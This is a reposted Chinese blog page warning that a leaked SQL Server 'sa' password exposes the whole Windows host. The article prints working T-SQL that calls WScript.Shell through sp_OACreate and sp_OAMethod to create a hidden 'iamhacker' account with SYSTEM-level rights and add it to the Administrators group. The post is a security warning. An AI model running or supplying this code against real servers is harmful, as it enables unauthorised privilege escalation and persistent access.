SQL Server的安全隐患:不要以为黑掉的只是SQL SERVER而已。 (转)

最新推荐文章于 2022-03-23 11:50:06 发布
最新推荐文章于 2022-03-23 11:50:06 发布
阅读量94 收藏
点赞数
文章标签: shell
SQL Server的安全隐患:不要以为黑掉的只是SQL SERVER而已。 (转)[@more@]

sql SERVER存在着非常严重的安全隐患。sa的密码就像Administrator的密码一样重要。

假如别人获得了数据库超级用户sa的密码,那么他/她可以在查询分析器里使用下面的SQL语句轻易在win2000(SQL SERVER所在的Server)上创建一个超级用户:

declare @object int
--创建WScript.shell
EXEC sp_OACreate 'WScript.Shell',@object OUT
--运.NET user iamhacker opendoor /add
--添加一个名字为iamhacker,密码为opendoor的用户
EXEC sp_OAMethod @object,'Run',NULL,'net user iamhacker opendoor /add'
--把iamhacker添加到Administrators组中
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Administrators iamhacker /add'
--把iamhacker从User组中删除
EXEC sp_OAMethod @object,'Run',NULL,'net localgroup Users iamhacker /del'

我已经尝试过了。。实在太恐怖了。

上面的语句很短。核心是能够调用平台命令 net 。

其实现方法是SQL SERVER调用com Automation的强大功能。再配合WSH中的一个对象WScript.Shell的一个方法:Run。(注意,一般SQL SERVER都是配置在SYSTEM的权限下运行的。也就是说,Run所调用的程序也是具有SYSTEM的权限。)

(相关的实验是,调用一下NOTEPAD,那么任务管理器下将有用户为SYSTEM的NOTEPAD。EXE进程存在)

WScript.Shell的隐患其实已经在各个方面很显著了。想不到现在竟然在Sql Server上也有相关的问题。

所以。大家一定要注意保管好sa的密码。不要随便被人黑了哦。。。

 

 


来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752019/viewspace-975888/,如需转载,请注明出处,否则将追究法律责任。

转载于:http://blog.itpub.net/10752019/viewspace-975888/

ciya3282
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQL Server安全性
醉挽~清风
08-19 647
第11章 sql server安全性 安全性机制的5个等级 客户机安全机制:计算机的操作系统 网络传输的安全机制:传输数据,对数据进行加密,备份加密 实例级别安全机制:对整个数据库服务器进行限制,创建数据角色,控制访问权限 数据库级别安全机制:对数据库进行访问权限控制 对象级别安全机制:对数据表等对象进行访问权限设置 Sql server身份验证模式 1.Windows身份验证模式: 当使用Wi...
你的SQLServer服务器安全吗?
maxiaoqiang1的专栏
03-18 702
<br />本文只做技术交流,请勿用于非法用途,出现任何问题,本人概不负责。<br /><br />先说一件事吧,去年同事的一台笔记本电脑装的xp系统,三番几次被人增加系统用户,用户名都internetusers,问问同事的笔记本电脑最近都做什么了,答复是一家软件公司给安装了一套数据库软件,这下基本明白怎么回事了,因为同事的登陆界面已经不显示administrator这个用户名了,按了2次重启键,用administrator用户登录到系统,看到了sqlserver的运行图标,打开查询分析器,用sa登录,密码
SQL Server的几个安全问题
03-14 2031
单位的小王学习SQL Server已有一段时间了,已经做了个不错的管理系统,有次小王让我帮着看看库的设计有没有问题,其间我发现他的安全意识非常薄弱,这也许是初学者容易忽视的问题,本文探讨一些SQL Server常见的安全问题,是给初入SQL Server的人看的,写的肯定很絮叨,高手勿读。本文的用的是SQL Server 2000,下文中都简写为SQL Server。  一、空口令或弱口令  初学
SQL2005中,关闭SQL Browser服务,增强数据库的安全性
一个80后IT之路
05-03 1293
关闭SQL Browser服务,增强数据库的安全性 1、 在SQL 2005中,SQL Browser服务关闭后,如果客户端需要访问SQL Server数据库,并且SQL Server服务的端口非默认的1433端口,则远程访问SQL Server服务器的格式如下:192.168.1.102/SQL2005,1456 2、 在SQL 2000中,不存在SQL Browser服务,如果SQL 默认
sql server日志处理不当造成的隐患详解
12-15
本篇文章将深入探讨“sql server日志处理不当造成的隐患详解”,以及如何有效解决这类问题。 事故背景中,一个系统频繁出现“Unknown error 258”的错误,初步推测可能是由于数据库连接过多导致超时。然而,通过...
SQL Server 2000安全配置详解
01-19
SQL server2000数据库应用非常广泛,一旦出现安全问题,造成的损失往往难以估量!应提前预防,防患于未然。这里,我们主要谈论有关SQL Server2000数据库的安全配置以及一些相关的安全和使用上的问题。 在进行SQL ...
SQL Server 2000的安全配置
01-19
SQL Server 2000的安全配置在进行SQL Server 2000数据库的安全配置之前,首先你必须对操作系统进行安全配置,保证你的操作系统处于安全状态。然后对你要使用的操作数据库软件(程序)进行必要的安全审核,比如对ASP...
SQL Server 数据库安全配置手册
01-18
### SQL Server 数据库安全配置手册知识点详述 #### 文档概述 本文档旨在提供一系列针对Microsoft SQL Server(简称MSSQLServer)的安全配置指南。这些配置措施有助于加强数据库的安全性,减少潜在的安全风险。 ##...
消除SQL Server2000的安全隐患.pdf
09-19
然而,即使是广泛使用的数据库系统如SQL Server 2000,也存在着不少安全隐患。本文将从系统管理的角度出发,探讨如何消除SQL Server 2000的安全隐患。 首先,必须明确数据库中的数据对于企业的重要性。数据库中存储...
MSSQL 调用接口,仅分享
weixin_39023606的博客
10-14 769
MSSQL 调用接口,仅分享 MSSQL2016+支持JSON ------------------- 开启Sql Server 通讯配置 ------------------- --sp_configure 'show advanced options', 1; --GO --RECONFIGURE; --GO --sp_configure 'Ole Automation Procedures', 1; --GO --RECONFIGURE; --GO --EXEC sp_configure 'Ole
SQL Server 安全风险分析
单核CPU的小朋友的博客
03-23 1968
1、 查看SQL SERVER中的所有用户:(SQL 2000或2005都可用) Select * from sysusers; 2、 查看SQL SERVER服务器中所有空密码的用户:(2000/2005通用) select name,password from syslogins where password is null; 3、 设置mssql只能windows本地账户登陆: 4、 设置数据库日志审核: 右击数据库,打开数据库属性,选择安全性,将安全性中的审计级别调成全部。 5、 进行网络
常见的SQL Server 2000的漏洞及其相关利用
xiaoer
07-06 474
常见的SQL Server 2000的漏洞及其相关利用 单位的小王学习SQL Server已有一段时间了,已经做了个不错的管理系统,有次小王让我帮着看看库的设计有没有问题,其间我发现他的安全意识非常薄弱,这也许是初学者容易忽视的问题,本文探讨一些SQL Server常见的安全问题,是给初入SQL Server的人看的,写的肯定很絮叨,高手勿读。本文的用的是SQL Server 2000,下文...
Sql server 2014, 在Win server 2012 R2 使用 SP_OAMethod @object,'send' 报 parameter error问题
karas_27的博客
11-08 2849
有两种解决方案 第一种 EXEC @returnStatus= SP_OAMethod @object,‘send(“Your send data”)’ 第二种 打补丁 更新系统 在我的系统里,需要依次打三个补丁 KB2919442, https://www.microsoft.com/zh-cn/download/details.aspx?id=42153 kb2919355, http://...
SQL Server 数据库安全性①
Vaska_的博客
04-18 1585
数据库安全性概述 数据库的安全性是指保护数据库以防止不合法使用所造成的数据泄露,更改或破坏 1、数据库的不安全因素 ①非授权用户对数据库的恶意存取和破坏 例如 黑客猎取用户名和用户口令,然后假冒合法用户偷取、修改甚至破坏用户的数据 ②数据库中的重要或敏感的数据被泄露 为防止数据被泄露,数据库管理系统提供的主要技术由强制存取控制,数据加密存储和加密传输 ③安全环境的脆弱性 操作系统安全的脆弱,网络协议安全保障的不足等都会数据库安全性的破坏 2、安全标准简介 TCSEC和CC两个准则。 数据库安全性控制 在一般
渗透测试工具sqlmap基础教程
wjy397的专栏
12-16 1741
http://blog.csdn.net/zgyulongfei/article/details/41017493 版权声明:本文为博主原创文章,未经博主允许不得载。 目录(?)[+] 载请注明出处:http://blog.csdn.net/zgyulongfei/article/details/41017493 作者:羽龍飛  本
内置系统账户:Local system/Network service/Local Service 区别
weixin_34220623的博客
07-03 743
参考文献: http://www.cnblogs.com/xianspace/archive/2009/04/05/1429835.html 前言 今天在安装sqlserver2008 r2的时候,在Server Configuration阶段要求我设定sqlserver中各种服务的账户名称,如下图所示: 账户类型可以在后期修改,改的就是服务中的log on as里面的属性。 那么L...
SQL Server 安全篇——降低外围威胁(1)——网络配置
MVP黄钊吉(發糞塗牆)
02-28 2612
本文属于SQL Server安全专题系列    前面大篇幅介绍了SQL Server及操作系统的安全,现在是时候介绍一下外围主要是网络层面的安全。这部分主要包括网络功能、服务和端点。因为绝大部分的攻击都来自于网络,所以网络层的安全控制某种意义上可以说是最外层的防御。本文先介绍一下网络方面的配置。网络配置    在介绍之前先要了解一下基础知识,包括端口和协议。这对后续防火墙的管理很有必要。端口和协议...
SQL Server数据库安全性:添加成员到角色
在创建或使用SQL Server登录、用户或角色时,必须遵循特定的命名规则,避免使用可能导致混淆或安全隐患的字符。例如,如果名称包含空格或以特定字符开头,需要使用双引号或方括号包围。同时,名称不能包含反斜线,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值